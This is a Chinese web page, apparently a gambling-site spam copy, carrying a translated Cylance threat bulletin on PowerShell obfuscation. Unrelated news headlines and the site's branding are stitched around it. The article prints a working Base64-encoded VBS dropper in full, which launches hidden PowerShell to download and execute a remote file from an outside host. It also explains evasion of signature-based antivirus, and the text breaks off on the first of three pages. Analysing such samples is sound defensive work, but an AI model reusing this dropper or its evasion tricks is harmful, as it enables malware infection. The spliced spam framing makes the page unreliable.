太阳集团2138备用网址

  • “12326”民航服务质量监督电话正式开通 2019-04-23
  • 中铁佰和佰樂金婚盛典2017重阳节完美绽放 2019-04-23
  • 保护长江生态环境今年主抓8方面工作——生态环境部部长李干杰回应生态环境保护热点问题 2019-04-23
  • 新疆台办开展走访慰问台商台企活动 2019-04-23
  • 标致301优惠1.5万起 时尚代步经济全面 2019-04-23
  • 欢迎进入红色轨迹党史网站 2019-04-23
  • 【华商侃车NO.28】重磅!为什么315这么多车主维权? 2019-04-23
  • “上会神器”造型各异! 2019-04-23
  • 曾经赫赫有名如今艰难生存:华硕的解药到底在哪儿? 2019-04-23
  • 全国政协常委吴晶倡议:唱响《国歌》 激发爱国情怀【图文】 2019-04-23
  • 首届青运会开幕式文体表演简约而不简单 2019-04-23
  • 中国法学会第八次全国会员代表大会在京开幕 2019-04-23
  • 我是谁?我是海关关员 2019-04-23
  • “立委”南北辅选? 韩國瑜:要看时间 2019-04-22
  • 中国—东盟时装周上演马来西亚设计师婚纱礼服秀 2019-04-22
  • 欢迎来到 黑吧太阳集团2138备用网址 是业内专业的游戏平台,为你提供各式各样的精品游戏,最全的游戏项目,同时还为您提供各种游戏专题游戏攻略人气论坛。

    Powershell混淆——使用安全字符串

    来源:本站整理 作者:佚名 时间:2019-02-24 TAG: 我要投稿

    太阳集团2138备用网址 www.r-island.com 一、简介
    你认为现在威胁行为者的生活将会非常艰难,因为有大量的安全公司正在为不断增长的恶意软件黑名单提供数百万有效载荷指纹。
    你认为恶意软件绕过防病毒产品将是一项艰巨的任务,需要开发新的、从未见过的自定义恶意软件。
    如果你想法与上述其中任何一个相似的话,那么你就错了。
    威胁行为者越来越多的使用所谓的商业恶意软件(无论是免费还是象征性收费的,您可以在线找到现成的程序),而不是自定义的有效载荷。这些商业软件是所有防病毒公司都知道的恶意软件,其指纹(或“签名”)能够立即被识别。
    那么为什么威胁行为者越来越多的使用商业恶意软件?他们为什么能成功这样做?
    对这两个的问题简短回答是:混淆。
    在此威胁情报公告中,Cylance解释了混淆是什么以及它为何起作用。我们演示了最近观察到的混淆技术是如何成功绕过大多数防病毒产品的。
    二、背景
    Cylance一直在追踪一种趋势,即威胁行为者越来越多的转向普通的商品恶意软件。他们这样做是因为它便宜,易于使用,并且有助于匿名化。当一个恶意软件的指纹为众人所知并且在每个人都可以接触时,威胁行为者可以隐藏在一组不可能的嫌疑人中。有效载荷签名基本上变得毫无意义。
    尽管具有已知签名,商品恶意软件如何成功仍然是一个问题,这就需要借助混淆。这种技术可以有效地改变整体签名,尽管传播的是熟悉的有效载荷。
    混淆将攻击者的注意力从定制最终有效载荷转移到定制传播方法。可以认为这种转变是对许多防病毒产品捕获恶意软件方式的回应。
    如上所述,许多防病毒产品依靠签名来识别恶意软件。对于他们中的许多人来说,签名只是一个哈希或一个简单的字符串。在此上下文中,哈希是指一段恶意软件的唯一字符串。签名通常是哈希值,但它们也可以是一段恶意软件中唯一一段代码的其他简要表示。
    混淆是一门技术,它描述了一系列用于规避严重依赖签名的反病毒产品的技术。这些技术在不改变功能的情况下改变了恶意软件的整体结构。通常,这会产生层层嵌套,这些层可以掩盖最终的有效载荷,就像俄罗斯玩偶套娃一样。
    常见的混淆技术包括:
    · 压缩或“打包”恶意软件程序的打包程序
    · 加密算法,加密恶意软件程序(或其部分)
    · 其他混淆器,以各种方式改变恶意软件程序,从而改变程序中的总字节数
    这些混淆技术的效果是通过改变文件的大小(例如打包)或通过加密从反病毒产品中隐藏其唯一的代码串来改变恶意软件的散列以及签名。
    虽然一些防病毒产品会搜索常见的混淆技术,以便列入黑名单,但这种做法并不像恶意软件有效载荷签名的黑名单那样完善。
    在下面的技术分析中,我们剖析了一个样本,其混淆方法利用了PowerShell的功能,PowerShell是Microsoft Windows内置的工具。
    三、技术分析
    Cylance正在分析的恶意软件文件使用了罕见的PowerShell混淆方法,同时找到一些新鲜且很少被检测到的恶意脚本。该样本使用了Daniel Bohannon描述的几项技术。我们分析是一个包含PDF文档和VBS脚本的ZIP文件:
    50e7fe23731ad94f1714c1a8acfce3f8b6e6e918b3e3aa1daa7275cb6052e68c.
    在我们发现它时,该文件仅由三种产品检测到:

    VBS脚本使用基本的Base64编码来混淆第一层。该脚本的内容如下所示:
    Function l(a): With CreateObject("Msxml2.DOMDocument").CreateElement("aux"): .DataType = "bin.base64": .Text = a: l = r(.NodeTypedValue): End With: End Function
    Function r(b): With CreateObject("ADODB.Stream"): .Type = 1: .Open: .Write b: .Position = 0: .Type = 2: .CharSet = "utf-8": r = .ReadText: .Close: End With: End function
    Execute l("RnVuY3Rpb24gR2V0VGltZVpvbmVPZmZzZXQoKQ0KICAgIENvbnN0IHNDb21wdXRlciA9ICIuIg0KDQogICAgRGltIG9XbWlTZXJ2aWNlIDogU2V0IG9XbWlTZXJ2aWNlID0gXw0KICAgICAgICBHZXRPYmplY3QoIndpbm1nbXRzOntpbXBlcnNvbmF0aW9uTGV2ZWw9aW1wZXJzb25hdGV9IVxcIiBfDQogICAgICAgICAgICAgICAgICAmIHNDb21wdXRlciAmICJccm9vdFxjaW12MiIpDQoNCiAgICBEaW0gY1RpbWVab25lIDogU2V0IGNUaW1lWm9uZSA9IF8NCiAgICAgICAgb1dtaVNlcnZpY2UuRXhlY1F1ZXJ5KCJTZWxlY3QgKiBmcm9tIFdpbjMyX1RpbWVab25lIikNCg0KICAgIERpbSBvVGltZVpvbmUNCiAgICBGb3IgRWFjaCBvVGltZVpvbmUgaW4gY1RpbWVab25lDQogICAgICAgIEdldFRpbWVab25lT2Zmc2V0ID0gb1RpbWVab25lLkJpYXMgLyA2MA0KICAgICAgICBFeGl0IEZvcg0KICAgIE5leHQNCkVuZCBGdW5jdGlvbg0KDQoNCg0KDQoNClNldCB2ZXJ0dSA9IENyZWF0ZU9iamVjdCgiV1NjcmlwdC5TaGVsbCIpDQoNCnZrMj0iZXJTIg0KDQppZiBHZXRUaW1lWm9uZU9mZnNldCA9IDkgdGhlbg0KDQoJRGltIGh1bW0NCglodW1tPSJvZmZpY2UiDQoJdHNzMT0iUG93Ig0KCW9rb2w9InNzIC1jIg0KCW5vcDM9ImhlTGwiDQoJbXVyPSJsZSBoaWQiDQogICAgdmVydHUuUnVuKHRzczErdmsyK25vcDMrIiAtd2luZG93c3R5IittdXIrImRlbiAtbm9leGl0IC1leGVjdXRpb25wb2xpY3kgIGJ5cGEiK29rb2wrIm9tbWFuZCBJYEVYICgobmVXYC1PYmpgRWNUICgoJ05ldCcrJy4nKydXZWJjJysnbGllbnQnKSkpLigoJ0Rvd25sb2Fkc3QnKydyaScrJ25nJykpLkluVm9rRSgoKCdodCIrInRwOicrJy8iKyIvcicrJ2F2JysnaWcnKydlbC5jb20vMScrJ2NyLicrJ2RhJysndCcpKSkpICIpDQoJU2V0IHZlcnR1ID0gTm90aGluZw0KCVdTY3JpcHQuUXVpdA0KCWVsc2UgDQoJdG9wPTENCmVuZCBpZg0K")
    图1:初始VBS脚本的内容
    此脚本解码为:
    Function GetTimeZoneOffset()
       Const sComputer = "."
       Dim oWmiService : Set oWmiService = _
          GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
              & sComputer & "\root\cimv2")
       Dim cTimeZone : Set cTimeZone = _

    [1] [2] [3]  下一页

    【声明】:太阳集团2138备用网址(http://www.r-island.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@www.r-island.com,我们会在最短的时间内进行处理。
    • 最新更新
      • 相关阅读
        • 本类热门
          • 最近下载